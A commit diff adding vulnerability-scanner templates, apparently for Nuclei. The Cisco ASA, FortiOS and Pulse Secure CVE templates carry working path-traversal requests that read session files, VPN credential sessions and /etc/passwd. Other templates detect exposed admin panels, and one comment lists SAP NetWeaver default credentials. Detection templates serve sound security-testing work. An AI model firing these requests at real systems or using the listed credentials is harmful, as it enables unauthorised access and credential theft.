pending pull
parent
3bd6b44807
commit
413c126c29
|
@ -0,0 +1,22 @@
|
||||||
|
id: CVE-2018-0296
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cisco ASA path traversal vulnerability
|
||||||
|
author: organiccrap
|
||||||
|
severity: medium
|
||||||
|
# https://github.com/yassineaboukir/CVE-2018-0296
|
||||||
|
# curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
|
||||||
|
# if vuln, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "///sessions"
|
||||||
|
part: body
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,15 @@
|
||||||
|
id: CVE-2018-13379
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
|
||||||
|
author: organiccrap
|
||||||
|
severity: high
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "var fgt_lang ="
|
|
@ -0,0 +1,20 @@
|
||||||
|
id: CVE-2019-11510
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
|
||||||
|
author: organiccrap
|
||||||
|
severity: high
|
||||||
|
# https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0:"
|
||||||
|
part: body
|
|
@ -0,0 +1,17 @@
|
||||||
|
id: firebase-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: firebase detect
|
||||||
|
author: organiccrap
|
||||||
|
severity: low
|
||||||
|
# http://ghostlulz.com/google-exposed-firebase-database/
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Could not parse auth token"
|
||||||
|
part: body
|
|
@ -0,0 +1,16 @@
|
||||||
|
id: cisco-asa-panel-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cisco ASA VPN panel detect
|
||||||
|
author: organiccrap
|
||||||
|
severity: low
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/+CSCOE+/logon.html"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>SSL VPN Service</title>"
|
||||||
|
part: body
|
|
@ -0,0 +1,16 @@
|
||||||
|
id: grafana-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Grafana panel detect
|
||||||
|
author: organiccrap
|
||||||
|
severity: low
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/login"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>Grafana</title>"
|
||||||
|
part: body
|
|
@ -0,0 +1,17 @@
|
||||||
|
id: sap-netweaver-portal-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SAP NetWeaver Portal detect
|
||||||
|
author: organiccrap
|
||||||
|
severity: low
|
||||||
|
# SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/irj/portal"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>SAP NetWeaver Portal</title>"
|
||||||
|
part: body
|
|
@ -0,0 +1,16 @@
|
||||||
|
id: supervpn-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SuperVPN panel detect
|
||||||
|
author: organiccrap
|
||||||
|
severity: low
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/admin/login.html"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>Sign In-SuperVPN</title>"
|
||||||
|
part: body
|
Loading…
Reference in New Issue